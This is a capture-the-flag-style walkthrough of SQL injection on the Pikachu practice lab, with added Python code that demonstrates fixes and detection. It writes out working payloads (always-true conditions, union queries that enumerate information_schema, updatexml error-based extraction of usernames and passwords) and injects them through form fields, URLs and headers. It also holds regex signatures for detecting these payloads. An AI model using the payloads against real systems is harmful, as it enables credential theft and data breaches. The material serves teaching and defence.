Pikachu - SQL injection module

Numeric SQL injection (POST type):

First submit 1:

Because the request is a POST, capture it and change the parameter to an always-true condition:

id=1 or 1=1

As you can see, the page returns all the data.

String-type SQL injection (GET type):

Entering a value directly:

For string-type injection you first have to close the quoted string in the SQL statement and then append an always-true condition; this returns all the data:

kobe' or 1=1 #

Search injection:

Try searching for the letter k:

Looking at the source code:

Here you can see the search SQL statement: select username,id,email from member where username like '%$name%'

Similarly, close the SQL statement and append an always-true condition: k%' or 1=1 #

All the data is returned:
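The three injections above (numeric, string and search) all come from the same defect: the user's text is concatenated into the SQL statement. The following is an added example, not code from the Pikachu project or the original post; it reproduces each case against a constructed SQLite table (standing in for Pikachu's MySQL member table) and places the parameterized query that neutralises it beside the vulnerable one. Because SQLite does not treat `#` as a comment, the payloads here end in `-- ` instead.

```python
"""Added example (not from the Pikachu project): the numeric, string and
search injections shown above, reproduced against a constructed SQLite
table, beside the parameterized queries that neutralise them."""
import sqlite3

# Constructed sample rows standing in for Pikachu's `member` table.
SAMPLE_ROWS = [
    (1, "vince", "vince@example.test"),
    (2, "allen", "allen@example.test"),
    (3, "kobe", "kobe@example.test"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table member (id integer primary key, username text, email text)")
    conn.executemany("insert into member values (?,?,?)", SAMPLE_ROWS)
    return conn


# --- Vulnerable: the user's text becomes part of the SQL statement ----------
# (SQLite does not treat `#` as a comment, so the payloads end with `-- `
# instead; MySQL, which Pikachu uses, accepts both.)

def numeric_vulnerable(conn, id_param):
    # "1 or 1=1" turns the WHERE clause into an always-true condition.
    sql = "select id,username,email from member where id=" + id_param
    return conn.execute(sql).fetchall()


def string_vulnerable(conn, name):
    # "kobe' or 1=1 -- " closes the quoted string, adds the condition and
    # comments out the closing quote that the code appends.
    sql = "select id,username,email from member where username='" + name + "'"
    return conn.execute(sql).fetchall()


def search_vulnerable(conn, name):
    # "k%' or 1=1 -- " does the same inside the LIKE pattern.
    sql = "select id,username,email from member where username like '%" + name + "%'"
    return conn.execute(sql).fetchall()


# --- Hardened: SQL text is fixed, user data travels as bound parameters -----

def numeric_safe(conn, id_param):
    # A numeric id is validated as an integer first; "1 or 1=1" is rejected
    # with ValueError before any SQL runs.
    id_value = int(id_param)
    return conn.execute(
        "select id,username,email from member where id=?", (id_value,)
    ).fetchall()


def string_safe(conn, name):
    # The quote in the input is just a character inside the bound value.
    return conn.execute(
        "select id,username,email from member where username=?", (name,)
    ).fetchall()


def search_safe(conn, name):
    # The wildcards belong to the application, not the user: user-supplied
    # % and _ are escaped so they match literally, then wrapped in %...%.
    escaped = name.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return conn.execute(
        "select id,username,email from member where username like ? escape '\\'",
        ("%" + escaped + "%",),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("numeric vulnerable:", numeric_vulnerable(db, "1 or 1=1"))
    print("string  vulnerable:", string_vulnerable(db, "kobe' or 1=1 -- "))
    print("search  vulnerable:", search_vulnerable(db, "k%' or 1=1 -- "))
    print("string  safe      :", string_safe(db, "kobe' or 1=1 -- "))
    print("search  safe      :", search_safe(db, "k%' or 1=1 -- "))
```

The vulnerable functions return all three rows for each payload; the hardened ones return only the row whose username actually equals or contains the submitted text, and the numeric variant refuses non-integer input outright. Escaping `%` and `_` in search_safe is the detail most often forgotten: without it a bare `%` still matches every row, even with a bound parameter.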


xx-type injection:

The parameter is wrapped differently here: a') or 1=1 #

Union injection (using the previous type as the example):

Determine the number of columns: a') order by 3 #

a') order by 2#

From this we know the number of columns is 2.

Then use a union query to get the database name: pikachu

a') union select database(),2#

Query the tables in the database:

x') union select table_schema,table_name from information_schema.tables where table_schema='pikachu'#

Query the column names in the users table:

x') union select table_name,column_name from information_schema.columns where table_name='users'#

Union query to get the usernames and passwords: a') union select username,password from users #

Error-based injection:

Precondition: the backend does not suppress database error messages.

Commonly used functions: updatexml(), extractvalue(), floor()

The other steps are omitted (the payload can be adapted from the sections above). Get the username and password directly:

k') and updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1)  ),1)#
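The precondition above is the whole point of error-based injection: the technique only works if the database engine's error text reaches the client. The following added example (not Pikachu code) sends the payload above through two handlers that differ only in what they do with a database exception. SQLite stands in for MySQL, so the error is a plain syntax error rather than the XPath error updatexml() produces, but the disclosure pattern is the same; the table and rows are constructed.

```python
"""Added example (not from the Pikachu project): the same malformed input
handled by a handler that echoes the database error and one that logs it
and returns a generic message. SQLite stands in for MySQL."""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table member (id integer primary key, username text)")
    conn.executemany("insert into member (username) values (?)", [("vince",), ("kobe",)])
    return conn


# Stands in for the server-side error log the hardened handler writes to.
AUDIT_LOG = []


def run_query(conn, sql, params=(), expose_errors=False):
    """Execute and shape a response; expose_errors models a debug-style
    backend that returns the raw engine error to the client."""
    try:
        return {"status": 200, "body": conn.execute(sql, params).fetchall()}
    except sqlite3.Error as exc:
        if expose_errors:
            # This is the channel updatexml()/extractvalue() rely on.
            return {"status": 500, "body": str(exc)}
        # Detail stays server-side; the client learns nothing about the query.
        AUDIT_LOG.append({"sql": sql, "error": str(exc)})
        return {"status": 500, "body": "internal error"}


def search_concatenated(conn, name, expose_errors):
    # Still injectable: the input is part of the SQL text.  Suppressing the
    # error only closes the error-based channel, it does not fix the bug.
    sql = "select username from member where username like '%" + name + "%'"
    return run_query(conn, sql, expose_errors=expose_errors)


def search_parameterized(conn, name):
    # The actual fix: no SQL text comes from the user, so there is nothing
    # to parse wrongly and no error to leak.
    return run_query(
        conn, "select username from member where username like ?", ("%" + name + "%",)
    )


# The error-based payload from the walkthrough above.
PAYLOAD = ("k') and updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) "
           "from pikachu.users limit 0,1)  ),1)#")


if __name__ == "__main__":
    db = make_db()
    print("exposed   :", search_concatenated(db, PAYLOAD, expose_errors=True))
    print("suppressed:", search_concatenated(db, PAYLOAD, expose_errors=False))
    print("audit log :", AUDIT_LOG)
    print("fixed     :", search_parameterized(db, PAYLOAD))
```

With errors exposed, the client receives the engine's message and the injected fragment it choked on; with errors suppressed, the same request yields a generic 500 and the detail lands in the audit log, which is where a defender would pick up the updatexml()-style probes. Only the parameterized handler treats the payload as an ordinary search string and returns an empty result.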


insert injection:

The insert SQL statement: insert into member (username,pw,sex,phonenum,email,address) values('hzk','123456',1,123,123,123);

In one of the required fields of the insert form: hzk' or  updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1)  ),1)  or '

The other steps are the same; just copy the payload.

update injection:

Log in first, then enter the statement directly in the edit-profile form; the payload is the same as for insert:

hzk' or  updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1)  ),1)  or '

This yields the username and password.

delete injection:

Capture the request when deleting:

The backend deletes by id; send the request to Repeater and modify it:

id= 1 or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1)  ),1)

Because the payload is in the URL, it needs to be URL-encoded:

This yields the username and password.

HTTP header injection:

After logging in, you notice that the page reads header information, so injection may be possible.

Capture the request:

Modify the User-Agent or Cookie to perform the injection:

firefox'or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1)  ),1) or '

This yields the username and password.
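Every payload on this page has a recognisable shape (an always-true condition, union select, order by N, information_schema, updatexml/extractvalue), and the last two sections show that the shape can arrive URL-encoded in a query string or sit in the User-Agent or Cookie rather than in any form parameter. The following added example, not from the Pikachu project or the original post, scans constructed request log lines for those shapes. The tab-separated log format, the paths and the session ids are assumptions made for the example.

```python
"""Added example (not from the Pikachu project or the original post):
signature-based detection of the payload shapes used on this page, run
over constructed request log lines. Log format, paths and session ids
are assumptions made for the example."""
import re
from urllib.parse import quote_plus, unquote_plus

# Signatures derived from the payloads in the walkthrough above.
SIGNATURES = {
    "always-true":  re.compile(r"\bor\s+'?1'?\s*=\s*'?1", re.I),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "column-count": re.compile(r"\border\s+by\s+\d+", re.I),
    "schema-enum":  re.compile(r"\binformation_schema\b", re.I),
    "error-based":  re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I),
}

# Assumed log format: tab-separated time, method, path (with query string),
# request body ("-" if none), User-Agent and Cookie.
FIELDS = ("time", "method", "path", "body", "user_agent", "cookie")
# Headers are scanned too: the header-injection section shows the payload
# living in User-Agent or Cookie, with every parameter looking clean.
SCANNED = ("path", "body", "user_agent", "cookie")


def parse_line(line):
    parts = line.rstrip("\n").split("\t")
    if len(parts) != len(FIELDS):
        raise ValueError("malformed log line: %r" % line)
    return dict(zip(FIELDS, parts))


def scan_entry(entry):
    """Return (field, signature) pairs found in one parsed request."""
    findings = []
    for field in SCANNED:
        # Percent-decode first: the delete-by-id payload above only works
        # URL-encoded, and the encoded form would not match the patterns.
        decoded = unquote_plus(entry[field])
        for name, pattern in SIGNATURES.items():
            if pattern.search(decoded):
                findings.append((field, name))
    return findings


def scan_log(lines):
    """Scan a sequence of log lines; report only the lines with findings."""
    report = []
    for number, line in enumerate(lines, start=1):
        entry = parse_line(line)
        findings = scan_entry(entry)
        if findings:
            report.append({"line": number, "path": entry["path"], "findings": findings})
    return report


# The error-based payload from the walkthrough above.
ERROR_PAYLOAD = ("updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) "
                 "from pikachu.users limit 0,1)  ),1)")

# Constructed sample log: five requests carrying this page's payloads, then two benign ones.
SAMPLE_LOG = [
    "2020-02-16T10:00:01\tPOST\t/sqli/numeric\tid=1+or+1%3D1&submit=query\tMozilla/5.0\tPHPSESSID=s1",
    "2020-02-16T10:00:05\tGET\t/sqli/string?name=kobe%27+or+1%3D1+%23\t-\tMozilla/5.0\tPHPSESSID=s1",
    "2020-02-16T10:00:09\tGET\t/sqli/xx?name=x%27%29+union+select+table_schema%2Ctable_name"
    "+from+information_schema.tables+where+table_schema%3D%27pikachu%27%23\t-\tMozilla/5.0\tPHPSESSID=s1",
    "2020-02-16T10:00:13\tGET\t/sqli/delete?id=1+or+" + quote_plus(ERROR_PAYLOAD)
    + "\t-\tMozilla/5.0\tPHPSESSID=s1",
    "2020-02-16T10:00:17\tGET\t/sqli/header\t-\tfirefox'or " + ERROR_PAYLOAD + " or '\tPHPSESSID=s1",
    "2020-02-16T10:00:21\tGET\t/sqli/string?name=kobe\t-\tMozilla/5.0\tPHPSESSID=s2",
    "2020-02-16T10:00:25\tPOST\t/sqli/numeric\tid=2&submit=query\tMozilla/5.0\tPHPSESSID=s2",
]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The report names the field that carried the payload, so the header-injection request is flagged on user_agent while its path, body and cookie are clean. Patterns like `order by N` will also match legitimate sort parameters on some applications, so this kind of signature scan is a triage aid for the audit log, not a substitute for the parameterized queries shown earlier.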


Origin www.cnblogs.com/hzk001/p/12309317.html